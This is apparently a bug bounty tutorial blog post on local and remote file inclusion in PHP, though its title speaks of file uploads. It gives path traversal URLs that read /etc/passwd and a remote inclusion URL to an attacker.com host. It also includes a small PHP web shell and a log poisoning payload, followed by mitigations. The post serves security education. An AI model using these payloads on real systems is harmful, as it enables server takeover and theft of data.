File Upload Vulnerabilities for Bug Bounty

ToxSec | A discussion on file upload vulnerabilities.

Dec 23, 2023

File Upload Vulnerabilities - Hacker Illustration

0x00 File Inclusion Vulnerabilities

File inclusion vulnerabilities are a type of web security flaw that allows an attacker to include a file, usually through a web application. This can lead to sensitive information disclosure, code execution, and ultimately, complete server compromise.

These vulnerabilities arise when an application uses user-supplied input to construct a path to a file on the server. If the application doesn't properly sanitize or validate this input, an attacker can manipulate it to include files they shouldn't have access to.

0x01 Local File Inclusion (LFI)

LFI vulnerabilities occur when an attacker can include local files on the server. This means the attacker can read files that are stored on the same server as the web application.

How LFI Works:

Imagine a web application that displays different pages based on a parameter in the URL, like this:

https://example.com/index.php?page=home.php

The application might use the page parameter to include the corresponding PHP file. If the application doesn't properly sanitize the page parameter, an attacker could try to include other files on the server, such as:

https://example.com/index.php?page=/etc/passwd

If successful, this would display the contents of the /etc/passwd file, which contains user account information.

Exploitation Techniques:

Path Traversal: Using ../ sequences to navigate up the directory structure and access files outside the intended directory.
Null Byte Injection: In older PHP versions, adding a null byte (%00) at the end of the path could truncate the path and bypass certain security checks.
Log Poisoning: Injecting malicious code into log files (e.g., Apache access logs) and then including the log file to execute the injected code.
Data URI scheme: Using data:// wrapper to inject and execute code.

0x02 Remote File Inclusion (RFI)

RFI vulnerabilities occur when an attacker can include remote files from a different server. This is generally more dangerous than LFI because it allows the attacker to execute arbitrary code on the server.

How RFI Works:

Similar to LFI, RFI exploits the same principle of including files based on user-supplied input. However, in this case, the attacker provides a URL pointing to a file on a remote server.

For example:

https://example.com/index.php?page=http://attacker.com/evil.txt

If the application allows including remote files, it will fetch the contents of evil.txt from attacker.com and execute it.

Exploitation Techniques:

Direct URL Inclusion: Providing a direct URL to a malicious file hosted on an attacker-controlled server.
Wrapper Exploitation: Using PHP wrappers like data:// or php://input to inject and execute code.

0x03 Identifying File Inclusion Vulnerabilities

Identifying file inclusion vulnerabilities requires careful observation and testing. Here are some techniques you can use:

Parameter Fuzzing: Look for parameters in the URL that seem to control file inclusion, such as page, include, file, template, etc. Try modifying these parameters with different file paths and URLs to see if you can trigger an error or include a file.
Error Message Analysis: Pay attention to error messages. They might reveal information about the file paths being used by the application.
Source Code Review: If you have access to the source code, look for functions like include(), require(), include_once(), and require_once() that use user-supplied input to construct file paths.
Black Box Testing: Without access to the source code, try common LFI payloads like /etc/passwd or ../../../../etc/passwd in the vulnerable parameters. For RFI, try including a simple PHP file from your own server that executes a harmless command like phpinfo().

0x04 Exploitation Examples

Let's look at some practical examples of exploiting file inclusion vulnerabilities:

Example 1: LFI with Path Traversal

Suppose you find a website with the following URL:

https://example.com/index.php?page=home.php

You suspect an LFI vulnerability. You try the following payload:

https://example.com/index.php?page=../../../../etc/passwd

If the application is vulnerable, this will display the contents of the /etc/passwd file.

Example 2: RFI with Direct URL Inclusion

You find a website with the following URL:

https://example.com/index.php?page=home.php

You suspect an RFI vulnerability. You create a simple PHP file on your server (attacker.com/evil.php) with the following content:

<?php
  echo "<pre>";
  system($_GET['cmd']);
  echo "</pre>";
?>

Then, you try the following payload:

https://example.com/index.php?page=http://attacker.com/evil.php&cmd=id

If the application is vulnerable, this will execute the id command on the server and display the output.

Example 3: LFI with Log Poisoning

You find a website with an LFI vulnerability. You try to include the Apache access log file:

https://example.com/index.php?page=/var/log/apache2/access.log

Before including the log file, you inject malicious PHP code into the log by sending a request to the website with the following User-Agent:

<?php system($_GET['cmd']); ?>

Now, when you include the log file, the injected PHP code will be executed. You can then execute arbitrary commands by adding the cmd parameter to the URL:

https://example.com/index.php?page=/var/log/apache2/access.log&cmd=id

0x05 File Inclusion Mitigation Strategies

Preventing file inclusion vulnerabilities requires careful coding practices and robust security measures. Here are some mitigation strategies:

Input Validation: Sanitize and validate all user-supplied input. Use whitelisting to allow only specific characters or file extensions.
Path Sanitization: Remove any potentially dangerous characters or sequences from the file path, such as ../ or %00.
Disable Remote File Inclusion: If your application doesn't need to include remote files, disable the allow_url_include directive in your PHP configuration.
Use Secure File Handling Functions: Use functions like realpath() to resolve the absolute path of a file and ensure it's within the allowed directory.
Principle of Least Privilege: Run the web server with the least necessary privileges to limit the impact of a successful attack.
Web Application Firewall (WAF): Implement a WAF to detect and block malicious requests, including those targeting file inclusion vulnerabilities.
Regular Security Audits: Conduct regular security audits and penetration testing to identify and fix vulnerabilities in your application.

0x06 Debrief - LFI & RFI

File inclusion vulnerabilities are a serious threat to web applications. By understanding the different types of file inclusion, how to identify them, and how to exploit them, you can become a more effective bug bounty hunter.

Remember to always test responsibly and ethically, and to report any vulnerabilities you find to the appropriate parties. By implementing proper mitigation strategies, developers can protect their applications from these types of attacks.